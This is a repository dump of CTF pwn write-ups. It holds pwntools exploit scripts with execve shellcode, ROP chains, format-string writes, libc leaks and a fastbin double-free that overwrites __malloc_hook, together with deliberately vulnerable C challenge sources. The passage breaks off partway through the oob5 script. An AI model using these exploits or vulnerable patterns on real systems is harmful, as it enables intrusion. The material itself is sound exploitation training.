├── .gitignore ├── Angelboy_Pwn-1 ├── bofe4sy └── hack.py ├── Angelboy_Pwn-2 ├── hack.py └── ret2sc ├── Angelboy_Pwn-3 ├── hack.py └── r3t2lib ├── Angelboy_Pwn-4 ├── hack.py └── simplerop_revenge ├── Angelboy_Pwn-5 ├── hack.py └── ret2plt ├── Angelboy_Pwn-6 ├── hack.py └── simplerop ├── LICENSE ├── README.md ├── baby_fmt ├── baby_fmt └── hack.py ├── baby_heap ├── baby_heap └── hack.py ├── echo_server ├── echo_server ├── echo_server.c └── hack.py ├── fmt-1 ├── fmt-1 └── hack.py ├── fmt-2 ├── fmt-2 └── hack.py ├── fmt-3 ├── fmt-3 └── hack.py ├── fmtstr ├── fmtstr ├── fmtstr.c └── hack.py ├── forging_chunk ├── forging_chunk ├── forging_chunk.c └── hack.py ├── gohome ├── gohome ├── gohome.c └── hack.py ├── math_teacher └── hack.py ├── oob1-sean_Pwn-1 ├── hack.py └── oob1 ├── oob2-sean_Pwn-2 ├── hack.py └── oob2 ├── oob3-sean_Pwn-3 ├── hack.py └── oob3 ├── oob4-sean_Pwn-4 ├── hack.py └── oob4 ├── oob5-sean_Pwn-5 ├── hack.py └── oob5 ├── pass ├── hack.py ├── pass └── pass.c ├── printable ├── hack.py └── printable ├── registration ├── hack.py ├── registration └── registration.c ├── ret2src ├── hack.py ├── ret2src └── ret2src.c ├── rop0-sean_Pwn-1 ├── hack.py └── rop0 ├── rop1-sean_Pwn-2 ├── hack.py └── rop1 ├── rop2-sean_Pwn-3 ├── hack.py └── rop2 ├── secret ├── hack.py ├── secret └── secret.c ├── snowman ├── hack.py ├── snowman ├── snowman.c └── snowman.py ├── tcache ├── hack.py └── tcache ├── uaf ├── hack.py └── uaf ├── unlink ├── hack.py ├── unlink └── unlink.c ├── 張元_Pwn-1 ├── hack.py └── luck ├── 張元_Pwn-10 ├── hack.py └── plt ├── 張元_Pwn-3 ├── hack.py └── rop ├── 張元_Pwn-6 ├── hack.py └── pwntools ├── 張元_Pwn-7 ├── binary └── hack.py ├── 張元_Pwn-8 ├── hack.py └── return └── 張元_Pwn-9 ├── hack.py └── shellcode /.gitignore: -------------------------------------------------------------------------------- 1 | core 2 | .gdb_history 3 | peda-session-* 4 | 5 | # Byte-compiled / optimized / DLL files 6 | __pycache__/ 7 | *.py[cod] 8 | *$py.class 9 | 10 | # C extensions 11 | *.so 
12 | 13 | # Distribution / packaging 14 | .Python 15 | build/ 16 | develop-eggs/ 17 | dist/ 18 | downloads/ 19 | eggs/ 20 | .eggs/ 21 | lib/ 22 | lib64/ 23 | parts/ 24 | sdist/ 25 | var/ 26 | wheels/ 27 | pip-wheel-metadata/ 28 | share/python-wheels/ 29 | *.egg-info/ 30 | .installed.cfg 31 | *.egg 32 | MANIFEST 33 | 34 | # PyInstaller 35 | # Usually these files are written by a python script from a template 36 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 37 | *.manifest 38 | *.spec 39 | 40 | # Installer logs 41 | pip-log.txt 42 | pip-delete-this-directory.txt 43 | 44 | # Unit test / coverage reports 45 | htmlcov/ 46 | .tox/ 47 | .nox/ 48 | .coverage 49 | .coverage.* 50 | .cache 51 | nosetests.xml 52 | coverage.xml 53 | *.cover 54 | *.py,cover 55 | .hypothesis/ 56 | .pytest_cache/ 57 | 58 | # Translations 59 | *.mo 60 | *.pot 61 | 62 | # Django stuff: 63 | *.log 64 | local_settings.py 65 | db.sqlite3 66 | db.sqlite3-journal 67 | 68 | # Flask stuff: 69 | instance/ 70 | .webassets-cache 71 | 72 | # Scrapy stuff: 73 | .scrapy 74 | 75 | # Sphinx documentation 76 | docs/_build/ 77 | 78 | # PyBuilder 79 | target/ 80 | 81 | # Jupyter Notebook 82 | .ipynb_checkpoints 83 | 84 | # IPython 85 | profile_default/ 86 | ipython_config.py 87 | 88 | # pyenv 89 | .python-version 90 | 91 | # pipenv 92 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 93 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 94 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 95 | # install all needed dependencies. 96 | #Pipfile.lock 97 | 98 | # PEP 582; used by e.g. 
github.com/David-OConnor/pyflow 99 | __pypackages__/ 100 | 101 | # Celery stuff 102 | celerybeat-schedule 103 | celerybeat.pid 104 | 105 | # SageMath parsed files 106 | *.sage.py 107 | 108 | # Environments 109 | .env 110 | .venv 111 | env/ 112 | venv/ 113 | ENV/ 114 | env.bak/ 115 | venv.bak/ 116 | 117 | # Spyder project settings 118 | .spyderproject 119 | .spyproject 120 | 121 | # Rope project settings 122 | .ropeproject 123 | 124 | # mkdocs documentation 125 | /site 126 | 127 | # mypy 128 | .mypy_cache/ 129 | .dmypy.json 130 | dmypy.json 131 | 132 | # Pyre type checker 133 | .pyre/ 134 | -------------------------------------------------------------------------------- /Angelboy_Pwn-1/bofe4sy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-1/bofe4sy -------------------------------------------------------------------------------- /Angelboy_Pwn-1/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = "amd64" 4 | 5 | ip = "140.110.112.77" 6 | port = 2121 7 | 8 | context.arch = "amd64" 9 | 10 | r = remote(ip, port) 11 | # r = process("./bofe4sy") 12 | 13 | ret = 0x4004c1 14 | win = 0x400646 15 | 16 | r.sendline(flat('a' * 40, ret, win)) 17 | 18 | r.interactive() 19 | -------------------------------------------------------------------------------- /Angelboy_Pwn-2/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = "amd64" 4 | 5 | ip = "140.110.112.77" 6 | port = 2122 7 | 8 | context.arch = "amd64" 9 | 10 | r = remote(ip, port) 11 | # r = process("./ret2sc") 12 | 13 | name = 0x601080 14 | shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 15 | 16 | r.sendafter(':', shellcode) 17 | 
r.sendlineafter(':', flat('a' * 40, name)) 18 | 19 | r.interactive() 20 | -------------------------------------------------------------------------------- /Angelboy_Pwn-2/ret2sc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-2/ret2sc -------------------------------------------------------------------------------- /Angelboy_Pwn-3/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = "amd64" 4 | 5 | ip = "140.110.112.77" 6 | port = 2123 7 | 8 | r = remote(ip, port) 9 | # r = process("./r3t2lib") 10 | 11 | main = 0x4006f6 12 | puts_got = 0x601018 13 | libc_start_got = 0x601030 14 | puts_off = 0x06f690 15 | 16 | r.sendlineafter(':', hex(puts_got)) 17 | r.recvuntil(':') 18 | libc = int(r.recvline().strip(), 16) - puts_off 19 | log.info(hex(libc)) 20 | 21 | ''' 22 | r.sendlineafter(':', 'a' * 280 + p64(main)) 23 | r.sendlineafter(':', hex(libc_start_got)) 24 | ''' 25 | 26 | win = libc + 0x45216 27 | r.sendlineafter(':', b'a' * 280 + p64(win)) 28 | 29 | r.interactive() 30 | -------------------------------------------------------------------------------- /Angelboy_Pwn-3/r3t2lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-3/r3t2lib -------------------------------------------------------------------------------- /Angelboy_Pwn-4/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | context.arch = "amd64" 5 | 6 | ip = "140.110.112.77" 7 | port = 2124 8 | 9 | r = remote(ip, port) 10 | # r = process("./simplerop_revenge") 11 | 12 | main = 0x40093d 13 | data = 0x6cc000 - 0x100 14 | read = 0x43F3B0 15 | pop_rsi = 0x401577 
16 | pop_rax_rdx_rbx = 0x478516 17 | pop_rdi = 0x401456 18 | syscall = 0x4671b5 19 | 20 | r.sendlineafter(':', b'a' * 40 + flat(pop_rsi, data, read, main)) 21 | time.sleep(0.1) 22 | r.send('/bin/sh') 23 | r.sendlineafter(':', b'a' * 40 + flat(pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data, pop_rsi, 0, syscall)) 24 | 25 | r.interactive() 26 | -------------------------------------------------------------------------------- /Angelboy_Pwn-4/simplerop_revenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-4/simplerop_revenge -------------------------------------------------------------------------------- /Angelboy_Pwn-5/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | context.arch = "amd64" 5 | 6 | ip = "140.110.112.77" 7 | port = 2125 8 | 9 | r = remote(ip, port) 10 | # r = process("./ret2plt") 11 | 12 | main = 0x400636 13 | printf_got = 0x601020 14 | libc_start_got = 0x601028 15 | puts_plt = 0x4004e0 16 | pop_rdi = 0x4006f3 17 | 18 | r.sendlineafter(':', b'a' * 40 + flat(pop_rdi, libc_start_got, puts_plt, main)) 19 | r.recvline() 20 | libc = u64(r.recv()[:6].ljust(8, b'\x00')) - 0x020740 21 | log.info(hex(libc)) 22 | 23 | magic = libc + 0x45216 24 | time.sleep(0.1) 25 | r.sendline(b'a' * 40 + flat(magic)) 26 | 27 | r.interactive() 28 | -------------------------------------------------------------------------------- /Angelboy_Pwn-5/ret2plt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-5/ret2plt -------------------------------------------------------------------------------- /Angelboy_Pwn-6/hack.py: -------------------------------------------------------------------------------- 1 | from pwn 
import * 2 | import time 3 | 4 | ip = "140.110.112.77" 5 | port = 2126 6 | 7 | r = remote(ip, port) 8 | # r = process("./simplerop") 9 | 10 | main = 0x8048e24 11 | data = 0x80eb000 - 0x100 12 | read = 0x806CD50 13 | pop_eax = 0x80bae06 14 | pop_ecx_ebx = 0x806e851 15 | pop_edx = 0x806e82a 16 | syscall = 0x80493e1 17 | 18 | r.sendlineafter(':', b'a' * 32 + flat(read, main, 0, data, 0x100)) 19 | time.sleep(0.1) 20 | r.send('/bin/sh\x00') 21 | r.sendlineafter(':', b'a' * 24 + flat(pop_eax, 11, pop_ecx_ebx, 0, data, pop_edx, 0, syscall)) 22 | 23 | r.interactive() 24 | -------------------------------------------------------------------------------- /Angelboy_Pwn-6/simplerop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-6/simplerop -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Si Chen Lin 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Pwn-CTF-writeups -------------------------------------------------------------------------------- /baby_fmt/baby_fmt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/baby_fmt/baby_fmt -------------------------------------------------------------------------------- /baby_fmt/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 4001 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./baby_fmt") 10 | 11 | payload = ".".join([f"%{x}$p" for x in range(6, 11)]) 12 | r.sendlineafter(":D", payload) 13 | 14 | r.recvuntil(":") 15 | flag = list(map(lambda x: int(x, 16), r.recvline()[:-1].split(b"."))) 16 | print(b"".join(list(map(lambda x: int.to_bytes(x, 8, 'little'), flag)))) 17 | 18 | r.interactive() 19 | -------------------------------------------------------------------------------- /baby_heap/baby_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/baby_heap/baby_heap -------------------------------------------------------------------------------- /baby_heap/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 4008 5 | 6 | 
context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./baby_heap") 10 | 11 | Libc = ELF("./libc-2.23.so") 12 | 13 | def Add(sz, data): 14 | r.sendlineafter(">", "1") 15 | r.sendlineafter(":", str(sz)) 16 | r.sendlineafter(":", data) 17 | 18 | def Show(idx): 19 | r.sendlineafter(">", "2") 20 | r.sendlineafter(":", str(idx)) 21 | 22 | def Delete(idx): 23 | r.sendlineafter(">", "3") 24 | r.sendlineafter(":", str(idx)) 25 | 26 | Add(0x60, "aaaa") 27 | Add(0x400, "bbbb") 28 | Add(0x60, "cccc") 29 | Delete(1) 30 | Show(1) 31 | 32 | libc = u64(r.recvline()[:-1].ljust(8, b'\x00')) - 0x3c4b78 33 | Libc.address = libc 34 | log.info(hex(libc)) 35 | 36 | Delete(0) 37 | Delete(2) 38 | Delete(0) 39 | 40 | Add(0x60, p64(Libc.sym["__malloc_hook"] - 0x23)) 41 | Add(0x60, "dddd") 42 | Add(0x60, "eeee") 43 | Add(0x60, b"\x00" * 0x13 + p64(libc + 0xf02a4)) 44 | 45 | Delete(0) 46 | Delete(0) 47 | 48 | r.interactive() 49 | -------------------------------------------------------------------------------- /echo_server/echo_server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/echo_server/echo_server -------------------------------------------------------------------------------- /echo_server/echo_server.c: -------------------------------------------------------------------------------- 1 | #include"stdio.h" 2 | #include"stdlib.h" 3 | #include"string.h" 4 | 5 | char cmd[128]; 6 | 7 | void runCMD(){ 8 | system(cmd); 9 | return; 10 | } 11 | 12 | void getString(){ 13 | char input[32] = {0}; 14 | for(int i=0; i<128; i++)cmd[i] = 0; 15 | printf("> "); 16 | gets(input); 17 | strcat(cmd, "echo \'"); 18 | for(int i=0, j=6; i<32; i++){ 19 | if(input[i] == '\''){ 20 | strcat(cmd, "\'\\\'\'"); 21 | j += 4; 22 | }else{ 23 | cmd[j] = input[i]; 24 | j++; 25 | } 26 | } 27 | strcat(cmd, "\'"); 28 | return; 29 | } 30 | 31 | int main(){ 32 | 
setvbuf(stdout, 0, 2, 0); 33 | setvbuf(stdin, 0, 2, 0); 34 | 35 | printf("========= echo server =========\n"); 36 | printf("This is an echo server.\n"); 37 | printf("It will echo whatever you type.\n"); 38 | printf("But not something like:\n"); 39 | printf("/bin/sh\n"); 40 | printf("cat /home/ctf/flag\n"); 41 | printf("===============================\n"); 42 | 43 | while(1){ 44 | getString(); 45 | runCMD(); 46 | } 47 | 48 | return 0; 49 | } 50 | -------------------------------------------------------------------------------- /echo_server/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 6129 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./echo_server") 10 | 11 | binsh = 0x6009c0 12 | system = 0x400570 13 | pop_rdi = 0x400923 14 | ret = pop_rdi + 1 15 | 16 | payload = b"" 17 | payload += b"a" * 56 18 | payload += flat(pop_rdi, binsh, ret, system) 19 | 20 | r.sendlineafter(">", payload) 21 | 22 | r.interactive() 23 | -------------------------------------------------------------------------------- /fmt-1/fmt-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/fmt-1/fmt-1 -------------------------------------------------------------------------------- /fmt-1/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 4002 5 | 6 | r = remote(ip, port) 7 | # r = process("./fmt-1") 8 | 9 | context.arch = "amd64" 10 | 11 | secret = 0x404050 12 | 13 | payload = b"%256c%10$hhn".ljust(0x10) + flat(secret) 14 | 15 | r.sendafter(":", payload) 16 | r.sendafter(":", "\x00") 17 | 18 | r.interactive() 19 | -------------------------------------------------------------------------------- /fmt-2/fmt-2: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/fmt-2/fmt-2 -------------------------------------------------------------------------------- /fmt-2/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 4003 5 | 6 | r = remote(ip, port) 7 | # r = process("./fmt-2") 8 | 9 | context.arch = "amd64" 10 | 11 | magic = 0x404050 12 | length = 0x48 13 | target = 0xfaceb00c 14 | 15 | payload = b"" 16 | 17 | idx = 13 18 | pre = 0 19 | for i in range(2): 20 | val = (target & 0xffff) - pre 21 | target >>= 16 22 | val %= 65536 23 | if val == 0: 24 | val = 65536 25 | pre = val 26 | payload += f"%{val}c%{idx + i}$hn".encode() 27 | 28 | payload = payload.ljust(length - 0x10) + flat([magic + i * 2 for i in range(2)]) 29 | 30 | r.sendafter(":", payload) 31 | 32 | r.interactive() 33 | -------------------------------------------------------------------------------- /fmt-3/fmt-3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/fmt-3/fmt-3 -------------------------------------------------------------------------------- /fmt-3/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | ip = "140.110.112.77" 5 | port = 4004 6 | 7 | r = remote(ip, port) 8 | # r = process("./fmt-3") 9 | 10 | Libc = ELF("./libc-2.27.so") 11 | 12 | context.arch = "amd64" 13 | # context.log_level = "debug" 14 | 15 | main = 0x4011b3 16 | exit_got = 0x404030 17 | 18 | payload = b"%11$p.%4516c%9$hn".ljust(0x18, b'a') 19 | payload += flat(exit_got) 20 | 21 | r.sendline(payload) 22 | 23 | libc = int(r.recvuntil(".")[:-1], 16) - 0x3f3660 24 | log.info(hex(libc)) 25 | Libc.address 
= libc 26 | 27 | malloc_hook = Libc.sym["__malloc_hook"] 28 | win = libc + 0x4f322 29 | 30 | for i in range(8): 31 | val = win & 0xff 32 | win >>= 8 33 | val %= 256 34 | if val == 0: 35 | val = 256 36 | payload = b"%{}c%9$hhn".format(val).ljust(0x18, b'a') 37 | payload += flat(malloc_hook + i) 38 | r.sendline(payload) 39 | time.sleep(0.1) 40 | 41 | r.sendline("%65536c") 42 | 43 | r.interactive() 44 | -------------------------------------------------------------------------------- /fmtstr/fmtstr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/fmtstr/fmtstr -------------------------------------------------------------------------------- /fmtstr/fmtstr.c: -------------------------------------------------------------------------------- 1 | #include"stdio.h" 2 | #include"stdlib.h" 3 | 4 | int main(){ 5 | setvbuf(stdout, 0, 2, 0); 6 | setvbuf(stdin, 0, 2, 0); 7 | 8 | char flag[56] = "MyFirstCTF{??????????????????????????????????????????????}"; 9 | char input[40]; 10 | 11 | scanf("%s", input); 12 | printf(input); 13 | 14 | return 0; 15 | } 16 | -------------------------------------------------------------------------------- /fmtstr/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 6127 5 | 6 | r = remote(ip, port) 7 | # r = process("./fmtstr") 8 | 9 | payload = "" 10 | 11 | for i in range(12, 19): 12 | payload += "%{}$p.".format(i) 13 | 14 | r.sendline(payload) 15 | out = r.recv() 16 | flag = b"" 17 | 18 | for i in out.split(b"."): 19 | try: 20 | flag += p64(int(i, 16)) 21 | except: 22 | continue 23 | 24 | print(flag) 25 | 26 | r.interactive() 27 | -------------------------------------------------------------------------------- /forging_chunk/forging_chunk: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/forging_chunk/forging_chunk -------------------------------------------------------------------------------- /forging_chunk/forging_chunk.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | int input(); 7 | 8 | 9 | int main(int argc, char *argv[]) 10 | { 11 | int select; 12 | unsigned long long size = 0x20; 13 | unsigned long long victim; 14 | char *ary[4]; 15 | setvbuf(stdout, NULL, _IONBF, 0); 16 | printf("victim's address:%p\n", &victim); 17 | printf("size's address:%p\n", &size); 18 | printf("(0)free\n(1)malloc\n(2)write\n(3)show\ninput: "); 19 | while((select = input()) != EOF) 20 | { 21 | if(select == 1) // x = malloc 22 | { 23 | printf("ary[x] = malloc(8) // (0 <= x <= 3)\nx = "); 24 | if((select = input()) != EOF) ary[select] = (char *) malloc(8); 25 | else printf("invalid number\n"); 26 | printf("adr:%p\n", ary[select]); 27 | } 28 | else if(select == 0) // free(x) 29 | { 30 | printf("free(ary[x]) // (0 <= x <= 3)\nx = "); 31 | if((select = input()) != EOF) free(ary[select]); 32 | else printf("invalid number\n"); 33 | } 34 | else if(select == 2) // x = string 35 | { 36 | char *p; 37 | printf("*ary[x] = string // (0 <= x <= 3)\nx = "); 38 | while((select = input()) == EOF) 39 | { 40 | printf("invalid number\n"); 41 | printf("*ary[x] = string // (0 <= x <= 3)\nx = "); 42 | } 43 | p = ary[select]; 44 | printf("string = "); 45 | scanf("%s", p); 46 | } 47 | else if(select == 3) // show x 48 | { 49 | printf("print *ary[x] // (0 <= x <= 3)\nx = "); 50 | if((select = input()) != EOF) printf("your string:\n%s\n", ary[select]); 51 | else printf("invalid number\n"); 52 | } 53 | printf("(0)free\n(1)malloc\n(2)write\n(3)show\ninput: "); 54 | } 55 | 56 | if(victim == 0xdeadbeef) 57 | { 58 | system("cat flag.txt"); 59 | } 60 | printf("Goodbye!\n"); 61 | return 0; 62 | } 63 | 64 | 65 | int 
input() 66 | { 67 | int select; 68 | if(scanf("%d", &select) != EOF) 69 | { 70 | return (select >= 0 && select <= 3) ? select : EOF; 71 | } 72 | else 73 | { 74 | return EOF; 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /forging_chunk/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 9001 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./forging_chunk") 10 | 11 | def Free(idx): 12 | r.sendlineafter(":", "0") 13 | r.sendlineafter("x = ", str(idx)) 14 | 15 | def Malloc(idx): 16 | r.sendlineafter(":", "1") 17 | r.sendlineafter("x = ", str(idx)) 18 | r.recvuntil(":") 19 | return int(r.recvline()[:-1], 16) 20 | 21 | def Write(idx, data): 22 | r.sendlineafter(":", "2") 23 | r.sendlineafter("x = ", str(idx)) 24 | r.sendlineafter("=", data) 25 | 26 | r.recvuntil(":") 27 | victim = int(r.recvline()[:-1], 16) 28 | log.info(hex(victim)) 29 | r.recvuntil(":") 30 | sz = int(r.recvline()[:-1], 16) 31 | 32 | Malloc(0) 33 | Malloc(1) 34 | Free(0) 35 | Free(1) 36 | 37 | Write(1, p64(sz - 0x8)) 38 | Malloc(0) 39 | Malloc(1) 40 | 41 | Write(1, p64(0xdeadbeef)) 42 | r.sendlineafter(":", "87") 43 | 44 | r.interactive() 45 | -------------------------------------------------------------------------------- /gohome/gohome: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/gohome/gohome -------------------------------------------------------------------------------- /gohome/gohome.c: -------------------------------------------------------------------------------- 1 | #include"stdio.h" 2 | #include"stdlib.h" 3 | 4 | void Billyshouse(){ 5 | system("cat /home/ctf/flag"); 6 | } 7 | 8 | int main(){ 9 | setvbuf(stdout, 0, 2, 0); 10 | setvbuf(stdin, 0, 2, 0); 11 | 12 | char 
address[32]; 13 | 14 | printf("Billy want to go home now.\n"); 15 | printf("Do you know the address of his house ?"); 16 | 17 | gets(address); 18 | 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- /gohome/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 6126 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./gohome") 10 | 11 | ret = 0x400541 12 | win = 0x4006c6 13 | 14 | r.sendlineafter("?", flat("a" * 40, ret, win)) 15 | 16 | r.interactive() 17 | -------------------------------------------------------------------------------- /math_teacher/hack.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | from pwn import * 3 | 4 | ip = "140.110.112.77" 5 | port = 9003 6 | 7 | r = remote(ip, port) 8 | 9 | while True: 10 | x = Int('x') 11 | y = Int('y') 12 | s = Solver() 13 | for _ in range(2): 14 | eq = r.recvline().replace(b"=", b"==") 15 | if b"=" not in eq: 16 | print(eq) 17 | else: 18 | s.add(eval(eq)) 19 | if s.check() == sat: 20 | m = s.model() 21 | r.sendlineafter("=", str(m[x])) 22 | r.sendlineafter("=", str(m[y])) 23 | 24 | r.interactive() 25 | -------------------------------------------------------------------------------- /oob1-sean_Pwn-1/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 3111 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./oob1") 10 | 11 | r.sendlineafter(":", "-4") 12 | r.sendlineafter(":", "1234") 13 | 14 | r.recvuntil("[") 15 | pin = u32(r.recvuntil("]")[:-1][:4].ljust(4, b'\x00')) 16 | 17 | r.sendlineafter(":", "0") 18 | r.sendlineafter(":", str(pin)) 19 | 20 | r.interactive() 21 | -------------------------------------------------------------------------------- 
/oob1-sean_Pwn-1/oob1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/oob1-sean_Pwn-1/oob1 -------------------------------------------------------------------------------- /oob2-sean_Pwn-2/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 3112 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./oob2") 10 | 11 | r.sendlineafter(":", "-4") 12 | r.sendlineafter(":", p64(0xdeadbeef)) 13 | r.sendlineafter(":", "1234") 14 | 15 | r.sendlineafter(":", "0") 16 | r.sendlineafter(":", "admin") 17 | r.sendlineafter(":", str(0xdead0000)) 18 | 19 | r.interactive() 20 | -------------------------------------------------------------------------------- /oob2-sean_Pwn-2/oob2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/oob2-sean_Pwn-2/oob2 -------------------------------------------------------------------------------- /oob3-sean_Pwn-3/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 3113 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./oob3") 10 | 11 | win = 0x400924 12 | 13 | r.sendlineafter(":", "-17") 14 | r.sendlineafter(":", p64(win)) 15 | 16 | r.interactive() 17 | -------------------------------------------------------------------------------- /oob3-sean_Pwn-3/oob3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/oob3-sean_Pwn-3/oob3 
--------------------------------------------------------------------------------
/oob4-sean_Pwn-4/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for oob4: a negative index followed by a pointer-sized value (target binary is not in this listing)
2 |
3 | ip = "140.110.112.77"
4 | port = 3114
5 |
6 | context.arch = "amd64"
7 |
8 | r = remote(ip, port)
9 | # r = process("./oob4")
10 |
11 | win = 0x4007E6  # address written in the second prompt; presumably a function in the challenge binary — confirm against the binary
12 |
13 | r.sendlineafter(":", "-5")  # NOTE(review): negative index; the defensive fix in the binary is a range check before indexing
14 | r.sendlineafter(":", p64(win))
15 |
16 | r.interactive()
17 |
--------------------------------------------------------------------------------
/oob4-sean_Pwn-4/oob4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/oob4-sean_Pwn-4/oob4
--------------------------------------------------------------------------------
/oob5-sean_Pwn-5/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for oob5: the service prints a stack address; the index is computed from it (target binary is not in this listing)
2 |
3 | ip = "140.110.112.77"
4 | port = 3115
5 |
6 | context.arch = "amd64"
7 |
